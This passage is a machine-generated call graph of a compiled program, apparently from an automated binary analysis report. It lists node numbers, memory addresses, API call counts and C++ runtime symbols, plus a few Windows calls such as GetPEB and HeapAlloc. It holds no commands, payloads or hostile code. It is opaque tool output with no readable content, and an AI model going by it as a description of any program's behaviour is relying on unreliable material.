61645->61651 61652 7f375be8 61647->61652 61653 7f3463a0 std::ios_base::clear 32 API calls 61648->61653 61655 7f3ac670 53 API calls 61649->61655 61656 7f375415 61650->61656 61662 7f3345e0 53 API calls 61651->61662 61792 7f3762da 61651->61792 62391 7f334770 32 API calls 61652->62391 61654 7f375955 61653->61654 61658 7f3463a0 std::ios_base::clear 32 API calls 61654->61658 61659 7f3756c0 61655->61659 61660 7f3b0dd0 111 API calls 61656->61660 61665 7f375976 61658->61665 61666 7f3463a0 std::ios_base::clear 32 API calls 61659->61666 61667 7f375425 61660->61667 61661 7f3345e0 53 API calls 61668 7f37642e 61661->61668 61669 7f376172 61662->61669 61663 7f375bef 61664 7f3463a0 std::ios_base::clear 32 API calls 61663->61664 61671 7f375c10 61664->61671 61672 7f3463a0 std::ios_base::clear 32 API calls 61665->61672 61673 7f3756e1 61666->61673 62380 7f349250 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 61667->62380 61675 7f3342d0 53 API calls 61668->61675 62396 7f334770 32 API calls 61669->62396 61670 7f375e8c 61677 7f3345e0 53 API calls 61670->61677 61679 7f3463a0 std::ios_base::clear 32 API calls 61671->61679 61680 7f375997 61672->61680 61681 7f3463a0 std::ios_base::clear 32 API calls 61673->61681 61682 7f376434 61675->61682 61678 7f375ed5 61677->61678 62394 7f334770 32 API calls 61678->62394 61684 7f375c42 61679->61684 61685 7f3ac670 53 API calls 61680->61685 61686 7f375702 61681->61686 61691 7f3345e0 53 API calls 61682->61691 61801 7f3765d0 61682->61801 61688 7f3463a0 std::ios_base::clear 32 API calls 61684->61688 61689 7f3759ad 61685->61689 61690 7f3b0dd0 111 API calls 61686->61690 61687 7f375edc 61694 7f3463a0 std::ios_base::clear 32 API calls 61687->61694 61695 7f375c63 61688->61695 61696 7f3463a0 std::ios_base::clear 32 API calls 61689->61696 61697 7f375712 61690->61697 61698 7f37645a 61691->61698 61693 7f376179 61702 7f3345e0 53 API calls 61693->61702 61703 7f375efd 61694->61703 61704 7f3463a0 std::ios_base::clear 32 API calls 61695->61704 61705 7f3759ce 61696->61705 62384 7f349250 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 61697->62384 62399 7f334770 32 API calls 61698->62399 61709 7f3761c2 61702->61709 61710 7f3463a0 std::ios_base::clear 32 API calls 61703->61710 61711 7f375c84 61704->61711 61712 7f3463a0 std::ios_base::clear 32 API calls 61705->61712 61707 7f376461 62400 7f3492e0 30 API calls std::ios_base::clear 61707->62400 62397 7f334770 32 API calls 61709->62397 61715 7f375f2f 61710->61715 61716 7f3ac670 53 API calls 61711->61716 61717 7f3759ef 61712->61717 61713 7f3463a0 std::ios_base::clear 32 API calls 61718 7f376788 61713->61718 61720 7f3463a0 std::ios_base::clear 32 API calls 61715->61720 61721 7f375c9a 61716->61721 61722 7f3b0dd0 111 API calls 61717->61722 61724 7f3463a0 std::ios_base::clear 32 API calls 61718->61724 61719 7f3761c9 61725 7f3463a0 std::ios_base::clear 32 API calls 61719->61725 61726 7f375f50 61720->61726 61727 7f3463a0 std::ios_base::clear 32 API calls 61721->61727 61728 7f3759ff 61722->61728 61730 7f3767a9 61724->61730 61731 7f3761ea 61725->61731 61732 7f3463a0 std::ios_base::clear 32 API calls 61726->61732 61733 7f375cbb 61727->61733 62388 7f349250 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 61728->62388 61729 7f376489 61739 7f3345e0 53 API calls 61729->61739 61735 7f3463a0 std::ios_base::clear 32 API calls 61730->61735 61736 7f3463a0 std::ios_base::clear 32 API calls 61731->61736 61737 7f375f71 61732->61737 61738 7f3463a0 std::ios_base::clear 32 API calls 61733->61738 61740 7f3767ca 61735->61740 61741 7f37621c 61736->61741 61742 7f3ac670 53 API calls 61737->61742 61743 7f375cdc 61738->61743 61744 7f3764b8 61739->61744 61852 7f3ac670 61740->61852 61746 7f3463a0 std::ios_base::clear 32 API calls 61741->61746 61747 7f375f87 61742->61747 61748 7f3b0dd0 111 API calls 61743->61748 62401 7f334770 32 API calls 61744->62401 61751 7f37623d 61746->61751 61752 7f3463a0 std::ios_base::clear 32 API calls 61747->61752 61753 7f375cec 61748->61753 61757 7f3463a0 std::ios_base::clear 32 API calls 61751->61757 61758 7f375fa8 61752->61758 62392 7f349250 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 61753->62392 61755 7f3764bf 61759 7f3463a0 std::ios_base::clear 32 API calls 61755->61759 61756 7f3463a0 std::ios_base::clear 32 API calls 61760 7f376801 61756->61760 61761 7f37625e 61757->61761 61762 7f3463a0 std::ios_base::clear 32 API calls 61758->61762 61764 7f3764e0 61759->61764 61765 7f3463a0 std::ios_base::clear 32 API calls 61760->61765 61766 7f3ac670 53 API calls 61761->61766 61763 7f375fc9 61762->61763 61767 7f3b0dd0 111 API calls 61763->61767 61768 7f3463a0 std::ios_base::clear 32 API calls 61764->61768 61769 7f376822 61765->61769 61770 7f376274 61766->61770 61772 7f375fd9 61767->61772 61773 7f376512 61768->61773 61971 7f3b0dd0 61769->61971 61771 7f3463a0 std::ios_base::clear 32 API calls 61770->61771 61775 7f376295 61771->61775 62395 7f349250 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 61772->62395 61777 7f3463a0 std::ios_base::clear 32 API calls 61773->61777 61781 7f3463a0 std::ios_base::clear 32 API calls 61775->61781 61779 7f376533 61777->61779 61782 7f3463a0 std::ios_base::clear 32 API calls 61779->61782 61784 7f3762b6 61781->61784 61785 7f376554 61782->61785 61786 7f3b0dd0 111 API calls 61784->61786 61787 7f3ac670 53 API calls 61785->61787 61788 7f3762c6 61786->61788 61789 7f37656a 61787->61789 62398 7f349250 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 61788->62398 61791 7f3463a0 std::ios_base::clear 32 API calls 61789->61791 61793 7f37658b 61791->61793 61792->61661 61794 7f3463a0 std::ios_base::clear 32 API calls 61793->61794 61795 7f3765ac 61794->61795 61797 7f3b0dd0 111 API calls 61795->61797 61798 7f3765bc 61797->61798 62402 7f349250 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 61798->62402 61844 7f3467d0 61801->61844 61813 7f334609 61812->61813 61814 7f33464e 61813->61814 62403 7f348760 53 API calls 2 library calls 61813->62403 61818 7f3346c5 61814->61818 61819 7f334674 61814->61819 61816 7f334637 61817 7f37ca10 Concurrency::cancellation_token_source::~cancellation_token_source 51 API calls 61816->61817 61817->61814 61823 7f3467d0 std::ios_base::clear 32 API calls 61818->61823 61820 7f3467d0 std::ios_base::clear 32 API calls 61819->61820 61821 7f334680 61820->61821 62404 7f33a930 53 API calls 61821->62404 61824 7f3346d9 61823->61824 62409 7f334860 32 API calls std::ios_base::clear 61824->62409 61825 7f3346a6 62405 7f37b900 61825->62405 61828 7f3346fb 62410 7f3844c0 32 API calls std::ios_base::clear 61828->62410 61829 7f3346bd 61837 7f3342d0 61829->61837 61831 7f334720 62411 7f3d1f75 RaiseException 61831->62411 61833 7f334734 61834 7f37b900 std::ios_base::clear 30 API calls 61833->61834 61835 7f334740 61834->61835 61836 7f37b900 std::ios_base::clear 30 API calls 61835->61836 61836->61829 62413 7f333170 61837->62413 61839 7f3342f7 61840 7f37ca10 Concurrency::cancellation_token_source::~cancellation_token_source 51 API calls 61839->61840 61841 7f33430f 61840->61841 61842 7f386350 Concurrency::cancellation_token_source::~cancellation_token_source 53 API calls 61841->61842 61843 7f33431c 61842->61843 61843->61322 61843->61323 61845 7f34683a 61844->61845 61845->61845 62470 7f335370 61845->62470 61847 7f346871 61848 7f3463a0 61847->61848 61849 7f34641c 61848->61849 62478 7f3354a0 61849->62478 61851 7f346461 61851->61713 61853 7f333170 53 API calls 61852->61853 61854 7f3ac6b5 61853->61854 61855 7f333170 53 API calls 61854->61855 61856 7f3ac6e2 61855->61856 62486 7f345f50 61856->62486 61859 7f333170 53 API calls 61860 7f3ac773 61859->61860 62507 7f3331d0 61860->62507 61863 7f345f50 53 API calls 61864 7f3ac803 61863->61864 61865 7f333170 53 API calls 61864->61865 61866 7f3ac830 61865->61866 61867 7f3331d0 53 API calls 61866->61867 61868 7f3ac85c 61867->61868 61869 7f345f50 53 API calls 61868->61869 61870 7f3ac8c0 61869->61870 61871 7f333170 53 API calls 61870->61871 61872 7f3ac8ed 61871->61872 61873 7f3331d0 53 API calls 61872->61873 61874 7f3ac919 61873->61874 61875 7f345f50 53 API calls 61874->61875 61876 7f3ac97d 61875->61876 61877 7f333170 53 API calls 61876->61877 61878 7f3ac9aa 61877->61878 61879 7f3331d0 53 API calls 61878->61879 61880 7f3ac9d6 61879->61880 61881 7f345f50 53 API calls 61880->61881 61882 7f3aca3a 61881->61882 61883 7f333170 53 API calls 61882->61883 61884 7f3aca67 61883->61884 61885 7f3331d0 53 API calls 61884->61885 61886 7f3aca96 61885->61886 61887 7f345f50 53 API calls 61886->61887 61888 7f3acafa 61887->61888 61889 7f333170 53 API calls 61888->61889 61890 7f3acb27 61889->61890 61891 7f3331d0 53 API calls 61890->61891 61892 7f3acb56 61891->61892 61893 7f345f50 53 API calls 61892->61893 61894 7f3acbba 61893->61894 61895 7f333170 53 API calls 61894->61895 61896 7f3acbe7 61895->61896 61897 7f3331d0 53 API calls 61896->61897 61898 7f3acc16 61897->61898 61899 7f345f50 53 API calls 61898->61899 61900 7f3acc7a 61899->61900 61901 7f333170 53 API calls 61900->61901 61902 7f3acca7 61901->61902 61903 7f3331d0 53 API calls 61902->61903 61904 7f3accd6 61903->61904 61905 7f345f50 53 API calls 61904->61905 61906 7f3acd3a 61905->61906 61907 7f333170 53 API calls 61906->61907 61908 7f3acd67 61907->61908 61909 7f3331d0 53 API calls 61908->61909 61910 7f3acd96 61909->61910 61911 7f345f50 53 API calls 61910->61911 61912 7f3acdfa 61911->61912 61913 7f333170 53 API calls 61912->61913 61914 7f3ace27 61913->61914 61915 7f3331d0 53 API calls 61914->61915 61916 7f3ace59 61915->61916 61917 7f345f50 53 API calls 61916->61917 61918 7f3acebd 61917->61918 61919 7f333170 53 API calls 61918->61919 61920 7f3aceea 61919->61920 62512 7f339620 61920->62512 61925 7f345f50 53 API calls 61926 7f3acfaf 61925->61926 61927 7f333170 53 API calls 61926->61927 61928 7f3acfdc 61927->61928 61929 7f3331d0 53 API calls 61928->61929 61930 7f3ad014 61929->61930 61931 7f345f50 53 API calls 61930->61931 61932 7f3ad078 61931->61932 61933 7f333170 53 API calls 61932->61933 61934 7f3ad0ab 61933->61934 61935 7f339620 32 API calls 61934->61935 61936 7f3ad0e4 61935->61936 61937 7f333b60 53 API calls 61936->61937 61938 7f3ad11e 61937->61938 61939 7f345f50 53 API calls 61938->61939 61940 7f3ad182 61939->61940 61941 7f333170 53 API calls 61940->61941 61942 7f3ad1b5 61941->61942 61943 7f3331d0 53 API calls 61942->61943 61944 7f3ad1ed 61943->61944 61945 7f345f50 53 API calls 61944->61945 61946 7f3ad251 61945->61946 61947 7f333170 53 API calls 61946->61947 61948 7f3ad284 61947->61948 62521 7f333230 61948->62521 61951 7f345f50 53 API calls 61952 7f3ad320 61951->61952 61953 7f345f50 53 API calls 61952->61953 61954 7f3ad36c 61953->61954 61955 7f37b900 std::ios_base::clear 30 API calls 61954->61955 61956 7f3ad3df 61955->61956 61957 7f37b900 std::ios_base::clear 30 API calls 61956->61957 61958 7f3ad420 61957->61958 62526 7f345d40 61958->62526 61961 7f37ca10 Concurrency::cancellation_token_source::~cancellation_token_source 51 API calls 61962 7f3ad55a 61961->61962 61963 7f386350 Concurrency::cancellation_token_source::~cancellation_token_source 53 API calls 61962->61963 61964 7f3ad56d 61963->61964 61965 7f37b900 std::ios_base::clear 30 API calls 61964->61965 61966 7f3ad579 61965->61966 61967 7f37b900 std::ios_base::clear 30 API calls 61966->61967 61968 7f3ad585 61967->61968 61969 7f37b900 std::ios_base::clear 30 API calls 61968->61969 61970 7f3767e0 61969->61970 61970->61756 61972 7f3b0e0c 61971->61972 62625 7f351590 61972->62625 61974 7f3b0e3c 62629 7f350230 61974->62629 61976 7f3b0e66 62633 7f3529a0 61976->62633 61978 7f3b0e87 61982 7f3b0f13 61978->61982 62918 7f37caa0 61978->62918 61979 7f3b0f82 61980 7f333170 53 API calls 61979->61980 61983 7f3b0f9e 61980->61983 61982->61979 61985 7f37caa0 32 API calls 61982->61985 61984 7f3463a0 std::ios_base::clear 32 API calls 61983->61984 61986 7f3b0fc9 61984->61986 61985->61979 61986->61986 61987 7f335370 std::ios_base::clear 32 API calls 61986->61987 61988 7f3b106a 61987->61988 62637 7f384610 61988->62637 61990 7f3b1084 std::ios_base::clear 62650 7f394b90 GetPEB 61990->62650 61993 7f333170 53 API calls 61994 7f3b10de 61993->61994 61995 7f345f50 53 API calls 61994->61995 61996 7f3b1142 61995->61996 61997 7f333170 53 API calls 61996->61997 61998 7f3b1175 61997->61998 61999 7f3463a0 std::ios_base::clear 32 API calls 61998->61999 62000 7f3b11a0 61999->62000 62001 7f3345e0 53 API calls 62000->62001 62002 7f3b11ca 62001->62002 62003 7f33d200 32 API calls 62002->62003 62004 7f3b11e2 62003->62004 62005 7f384610 32 API calls 62004->62005 62006 7f3b1201 std::ios_base::clear 62005->62006 62007 7f394b90 4 API calls 62006->62007 62008 7f3b1234 62007->62008 62009 7f333170 53 API calls 62008->62009 62010 7f3b125b 62009->62010 62011 7f345f50 53 API calls 62010->62011 62012 7f3b12bf 62011->62012 62013 7f333170 53 API calls 62012->62013 62014 7f3b12f2 62013->62014 62015 7f3463a0 std::ios_base::clear 32 API calls 62014->62015 62016 7f3b131d 62015->62016 62017 7f3345e0 53 API calls 62016->62017 62018 7f3b1347 62017->62018 62019 7f33d200 32 API calls 62018->62019 62020 7f3b135f 62019->62020 62021 7f384610 32 API calls 62020->62021 62022 7f3b137e std::ios_base::clear 62021->62022 62023 7f394b90 4 API calls 62022->62023 62024 7f3b13b1 62023->62024 62025 7f333170 53 API calls 62024->62025 62026 7f3b13d8 62025->62026 62027 7f345f50 53 API calls 62026->62027 62028 7f3b143c 62027->62028 62029 7f333170 53 API calls 62028->62029 62030 7f3b146f 62029->62030 62031 7f3463a0 std::ios_base::clear 32 API calls 62030->62031 62032 7f3b149a 62031->62032 62033 7f3345e0 53 API calls 62032->62033 62034 7f3b14c4 62033->62034 62035 7f33d200 32 API calls 62034->62035 62036 7f3b14dc 62035->62036 62037 7f384610 32 API calls 62036->62037 62038 7f3b14fb std::ios_base::clear 62037->62038 62039 7f394b90 4 API calls 62038->62039 62040 7f3b152e 62039->62040 62041 7f333170 53 API calls 62040->62041 62042 7f3b1555 62041->62042 62043 7f345f50 53 API calls 62042->62043 62044 7f3b15b9 62043->62044 62045 7f333170 53 API calls 62044->62045 62046 7f3b15ec 62045->62046 62047 7f3463a0 std::ios_base::clear 32 API calls 62046->62047 62048 7f3b1617 62047->62048 62049 7f3345e0 53 API calls 62048->62049 62050 7f3b1641 62049->62050 62051 7f33d200 32 API calls 62050->62051 62052 7f3b1659 62051->62052 62053 7f384610 32 API calls 62052->62053 62054 7f3b167a std::ios_base::clear 62053->62054 62055 7f394b90 4 API calls 62054->62055 62056 7f3b16ad 62055->62056 62057 7f333170 53 API calls 62056->62057 62058 7f3b16d4 62057->62058 62059 7f345f50 53 API calls 62058->62059 62060 7f3b1738 62059->62060 62061 7f333170 53 API calls 62060->62061 62062 7f3b176b 62061->62062 62063 7f3463a0 std::ios_base::clear 32 API calls 62062->62063 62064 7f3b1796 62063->62064 62654 7f346480 62064->62654 62067 7f384610 32 API calls 62068 7f3b17d5 std::ios_base::clear 62067->62068 62069 7f394b90 4 API calls 62068->62069 62070 7f3b1808 62069->62070 62071 7f333170 53 API calls 62070->62071 62072 7f3b182f 62071->62072 62073 7f345f50 53 API calls 62072->62073 62074 7f3b1893 62073->62074 62075 7f333170 53 API calls 62074->62075 62076 7f3b18c6 62075->62076 62077 7f3463a0 std::ios_base::clear 32 API calls 62076->62077 62078 7f3b18f1 62077->62078 62079 7f346480 32 API calls 62078->62079 62080 7f3b191d 62079->62080 62081 7f384610 32 API calls 62080->62081 62082 7f3b1933 std::ios_base::clear 62081->62082 62083 7f394b90 4 API calls 62082->62083 62084 7f3b1966 62083->62084 62085 7f333170 53 API calls 62084->62085 62086 7f3b198d 62085->62086 62087 7f345f50 53 API calls 62086->62087 62088 7f3b19f1 62087->62088 62089 7f345f50 53 API calls 62088->62089 62090 7f3b1a3a 62089->62090 62091 7f37b900 std::ios_base::clear 30 API calls 62090->62091 62092 7f3b1a7b 62091->62092 62093 7f37b900 std::ios_base::clear 30 API calls 62092->62093 62094 7f3b1aa3 62093->62094 62095 7f37b900 std::ios_base::clear 30 API calls 62094->62095 62096 7f3b1acb 62095->62096 62097 7f37b900 std::ios_base::clear 30 API calls 62096->62097 62098 7f3b1af3 62097->62098 62099 7f37b900 std::ios_base::clear 30 API calls 62098->62099 62100 7f3b1b1b 62099->62100 62101 7f37b900 std::ios_base::clear 30 API calls 62100->62101 62102 7f3b1b43 62101->62102 62103 7f37b900 std::ios_base::clear 30 API calls 62102->62103 62104 7f3b1b6b 62103->62104 62660 7f392690 62104->62660 62106 7f3b1b82 std::ios_base::clear 62107 7f394b90 4 API calls 62106->62107 62108 7f3b1bb5 62107->62108 62108->62108 62109 7f335370 std::ios_base::clear 32 API calls 62108->62109 62110 7f3b1c39 62109->62110 62111 7f37b900 std::ios_base::clear 30 API calls 62110->62111 62112 7f3b1c48 62111->62112 62675 7f3348e0 62112->62675 62116 7f3b1c7d 62117 7f37b900 std::ios_base::clear 30 API calls 62116->62117 62118 7f3b1c88 62117->62118 62119 7f3463a0 std::ios_base::clear 32 API calls 62118->62119 62120 7f3b1c9f 62119->62120 62121 7f3463a0 std::ios_base::clear 32 API calls 62120->62121 62122 7f3b1cbd 62121->62122 62123 7f3463a0 std::ios_base::clear 32 API calls 62122->62123 62124 7f3b1cdb 62123->62124 62685 7f3b4560 62124->62685 62307 7f33d22d 62306->62307 63243 7f33d0d0 62307->63243 62309 7f33d250 std::ios_base::clear 62310 7f37b900 std::ios_base::clear 30 API calls 62309->62310 62311 7f33d277 62310->62311 62311->61334 62313 7f37ca3c 62312->62313 62314 7f37ca1f 62312->62314 62315 7f37ca64 62313->62315 63267 7f3df80d 51 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62313->63267 62314->62313 63266 7f3df80d 51 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62314->63266 62319 7f373c9c 62315->62319 63268 7f3df80d 51 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62315->63268 62320 7f386350 62319->62320 62321 7f386385 std::exception::exception 62320->62321 62322 7f38656d 62321->62322 62323 7f38638f 62321->62323 62350 7f38653f Concurrency::cancellation_token_source::~cancellation_token_source 62322->62350 63271 7f3b7e00 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62322->63271 63269 7f3b7e00 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62323->63269 62326 7f3869fb 62329 7f386a20 62326->62329 62330 7f386a07 62326->62330 62327 7f345d40 Concurrency::cancellation_token_source::~cancellation_token_source 51 API calls 62327->62350 62328 7f3863c6 Concurrency::cancellation_token_source::~cancellation_token_source 63270 7f339840 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62328->63270 63278 7f348f90 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62329->63278 62331 7f386a11 62330->62331 62332 7f386ab2 62330->62332 62338 7f37b900 std::ios_base::clear 30 API calls 62331->62338 62347 7f386a1b std::ios_base::_Ios_base_dtor 62331->62347 62335 7f37b800 Concurrency::cancellation_token_source::~cancellation_token_source 53 API calls 62332->62335 62339 7f386ac8 std::ios_base::_Ios_base_dtor 62335->62339 62337 7f386a36 std::ios_base::_Ios_base_dtor 62337->62347 63279 7f378060 30 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62337->63279 62341 7f386b5a std::ios_base::_Ios_base_dtor 62338->62341 62339->62347 63280 7f378060 30 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62339->63280 62340 7f37b800 Concurrency::cancellation_token_source::~cancellation_token_source 53 API calls 62344 7f386bd9 62340->62344 62341->62347 63281 7f378060 30 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62341->63281 62342 7f3865b8 Concurrency::cancellation_token_source::~cancellation_token_source 62342->62350 63272 7f336b40 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62342->63272 62344->61322 62347->62340 62349 7f37ca10 Concurrency::cancellation_token_source::~cancellation_token_source 51 API calls 62349->62350 62350->62326 62350->62327 62350->62349 62352 7f386350 Concurrency::cancellation_token_source::~cancellation_token_source 53 API calls 62350->62352 63273 7f3b4330 53 API calls 2 library calls 62350->63273 63274 7f339840 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62350->63274 63275 7f383a90 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62350->63275 63276 7f336b40 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62350->63276 63277 7f3839e0 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62350->63277 62352->62350 62356->61349 62357->61361 62358->61330 62359->61364 62360->61383 62361->61341 62362->61388 62363->61411 62364->61359 62365->61417 62366->61444 62367->61381 62368->61450 62369->61475 62370->61404 62371->61482 62372->61501 62373->61435 62374->61513 62375->61534 62376->61468 62377->61526 62378->61533 62379->61568 62380->61499 62381->61554 62382->61567 62383->61600 62384->61532 62385->61586 62386->61599 62387->61634 62388->61559 62389->61619 62390->61633 62391->61663 62392->61591 62393->61670 62394->61687 62395->61624 62396->61693 62397->61719 62398->61792 62399->61707 62400->61729 62401->61755 62402->61801 62403->61816 62404->61825 62406 7f37b92d 62405->62406 62408 7f37b994 std::ios_base::_Ios_base_dtor 62406->62408 62412 7f378060 30 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62406->62412 62408->61829 62409->61828 62410->61831 62411->61833 62412->62408 62418 7f345570 62413->62418 62416 7f37ca10 Concurrency::cancellation_token_source::~cancellation_token_source 51 API calls 62417 7f3331bf 62416->62417 62417->61839 62423 7f33b830 62418->62423 62421 7f37ca10 Concurrency::cancellation_token_source::~cancellation_token_source 51 API calls 62422 7f3331b4 62421->62422 62422->62416 62432 7f37c440 62423->62432 62426 7f3467d0 std::ios_base::clear 32 API calls 62428 7f33b8b6 62426->62428 62427 7f33b8df 62441 7f349600 62427->62441 62428->62427 62445 7f3df80d 51 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62428->62445 62431 7f33b91a 62431->62421 62433 7f37c45f 62432->62433 62434 7f37c45a 62432->62434 62436 7f37c480 62433->62436 62437 7f37c46f 62433->62437 62446 7f37b280 RaiseException Concurrency::cancel_current_task 62434->62446 62438 7f33b85c 62436->62438 62448 7f3d0c5b 62436->62448 62447 7f334a80 32 API calls 3 library calls 62437->62447 62438->62426 62442 7f349627 62441->62442 62444 7f34966c std::ios_base::_Ios_base_dtor 62441->62444 62442->62444 62469 7f378060 30 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62442->62469 62444->62431 62445->62427 62446->62433 62447->62438 62451 7f3d0c60 62448->62451 62450 7f3d0c7a 62450->62438 62451->62450 62453 7f3d0c7c Concurrency::cancel_current_task 62451->62453 62456 7f3df956 62451->62456 62465 7f3e0846 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 62451->62465 62466 7f3d1f75 RaiseException 62453->62466 62455 7f3d18b1 62457 7f3e5259 62456->62457 62458 7f3e5297 62457->62458 62460 7f3e5282 HeapAlloc 62457->62460 62463 7f3e526b _memcpy_s 62457->62463 62468 7f3d5b8e 14 API calls _memcpy_s 62458->62468 62461 7f3e5295 62460->62461 62460->62463 62462 7f3e529c 62461->62462 62462->62451 62463->62458 62463->62460 62467 7f3e0846 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 62463->62467 62465->62451 62466->62455 62467->62463 62468->62462 62469->62444 62471 7f335387 std::ios_base::clear 62470->62471 62473 7f335391 std::ios_base::clear 62471->62473 62476 7f37bc00 32 API calls std::ios_base::clear 62471->62476 62475 7f3353aa _memcpy_s 62473->62475 62477 7f334a00 32 API calls 2 library calls 62473->62477 62475->61847 62476->62473 62477->62475 62479 7f3354b7 std::ios_base::clear 62478->62479 62481 7f3354c1 std::ios_base::clear 62479->62481 62484 7f37bc00 32 API calls std::ios_base::clear 62479->62484 62483 7f3354da _memcpy_s 62481->62483 62485 7f334a00 32 API calls 2 library calls 62481->62485 62483->61851 62484->62481 62485->62483 62489 7f345fbc 62486->62489 62488 7f346061 62490 7f3460e1 62488->62490 62491 7f346069 62488->62491 62492 7f345fe0 62489->62492 62531 7f34cfd0 32 API calls 62489->62531 62536 7f33bee0 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62490->62536 62534 7f348760 53 API calls 2 library calls 62491->62534 62492->62488 62496 7f3467d0 std::ios_base::clear 32 API calls 62492->62496 62495 7f3460d9 62498 7f37ca10 Concurrency::cancellation_token_source::~cancellation_token_source 51 API calls 62495->62498 62497 7f34601c 62496->62497 62532 7f3844c0 32 API calls std::ios_base::clear 62497->62532 62501 7f34611d 62498->62501 62501->61859 62502 7f346079 62502->62495 62535 7f34b180 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62502->62535 62503 7f34603b 62533 7f3d1f75 RaiseException 62503->62533 62505 7f34604f 62506 7f37b900 std::ios_base::clear 30 API calls 62505->62506 62506->62488 62537 7f3455a0 62507->62537 62510 7f37ca10 Concurrency::cancellation_token_source::~cancellation_token_source 51 API calls 62511 7f33321f 62510->62511 62511->61863 62513 7f339645 62512->62513 62552 7f3337d0 62513->62552 62516 7f333b60 62556 7f3454e0 62516->62556 62519 7f37ca10 Concurrency::cancellation_token_source::~cancellation_token_source 51 API calls 62520 7f333baf 62519->62520 62520->61925 62569 7f3455e0 62521->62569 62524 7f37ca10 Concurrency::cancellation_token_source::~cancellation_token_source 51 API calls 62525 7f33327f 62524->62525 62525->61951 62527 7f37ca10 Concurrency::cancellation_token_source::~cancellation_token_source 51 API calls 62526->62527 62528 7f345d7c 62527->62528 62529 7f37ca10 Concurrency::cancellation_token_source::~cancellation_token_source 51 API calls 62528->62529 62530 7f345da1 62529->62530 62530->61961 62531->62489 62532->62503 62533->62505 62534->62502 62535->62502 62536->62495 62542 7f33b930 62537->62542 62540 7f37ca10 Concurrency::cancellation_token_source::~cancellation_token_source 51 API calls 62541 7f333214 62540->62541 62541->62510 62543 7f37c440 32 API calls 62542->62543 62544 7f33b95c 62543->62544 62545 7f3463a0 std::ios_base::clear 32 API calls 62544->62545 62547 7f33b9b4 62545->62547 62546 7f33b9dd 62549 7f349600 30 API calls 62546->62549 62547->62546 62551 7f3df80d 51 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62547->62551 62550 7f33ba18 62549->62550 62550->62540 62551->62546 62553 7f333870 62552->62553 62554 7f33383f 62552->62554 62555 7f335370 std::ios_base::clear 32 API calls 62553->62555 62554->62516 62555->62554 62561 7f33ba30 62556->62561 62559 7f37ca10 Concurrency::cancellation_token_source::~cancellation_token_source 51 API calls 62560 7f333ba4 62559->62560 62560->62519 62562 7f37c440 32 API calls 62561->62562 62563 7f33ba47 std::ios_base::clear 62562->62563 62564 7f33bac1 62563->62564 62568 7f3df80d 51 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62563->62568 62566 7f349600 30 API calls 62564->62566 62567 7f33baf5 62566->62567 62567->62559 62568->62564 62572 7f33b6c0 62569->62572 62577 7f33c000 62572->62577 62575 7f37ca10 Concurrency::cancellation_token_source::~cancellation_token_source 51 API calls 62576 7f333274 62575->62576 62576->62524 62586 7f37c520 62577->62586 62581 7f33c09c 62582 7f33c0c5 62581->62582 62603 7f3df80d 51 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62581->62603 62599 7f349740 62582->62599 62585 7f33b70f 62585->62575 62587 7f37c53f 62586->62587 62588 7f37c53a 62586->62588 62590 7f37c560 62587->62590 62591 7f37c54f 62587->62591 62604 7f37b280 RaiseException Concurrency::cancel_current_task 62588->62604 62593 7f33c02c 62590->62593 62594 7f3d0c5b std::_Facet_Register 16 API calls 62590->62594 62605 7f334a80 32 API calls 3 library calls 62591->62605 62595 7f3339d0 62593->62595 62594->62593 62596 7f333a35 62595->62596 62606 7f3358d0 62596->62606 62600 7f349767 62599->62600 62601 7f3497ac std::ios_base::_Ios_base_dtor 62599->62601 62600->62601 62624 7f378060 30 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62600->62624 62601->62585 62603->62582 62604->62587 62605->62593 62607 7f333a61 62606->62607 62608 7f33590d 62606->62608 62607->62581 62614 7f378190 32 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62608->62614 62610 7f335919 62615 7f33ace0 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62610->62615 62612 7f33594d 62612->62607 62616 7f37b800 62612->62616 62614->62610 62615->62612 62617 7f37b854 62616->62617 62620 7f37b8b0 std::ios_base::_Ios_base_dtor 62616->62620 62622 7f335fc0 53 API calls 2 library calls 62617->62622 62619 7f37b869 62619->62620 62623 7f378060 30 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62619->62623 62620->62607 62622->62619 62623->62620 62624->62601 62626 7f35164d 62625->62626 62628 7f3515c8 swprintf 62625->62628 62626->61974 62934 7f3d0fac 33 API calls 62628->62934 62630 7f3502e5 62629->62630 62632 7f350260 swprintf 62629->62632 62630->61976 62935 7f3d0fac 33 API calls 62632->62935 62635 7f352a5d 62633->62635 62636 7f3529d8 swprintf 62633->62636 62635->61978 62936 7f3d0fac 33 API calls 62636->62936 62638 7f3463a0 std::ios_base::clear 32 API calls 62637->62638 62639 7f384669 62638->62639 62937 7f3b27a0 62639->62937 62642 7f3463a0 std::ios_base::clear 32 API calls 62643 7f384686 62642->62643 62941 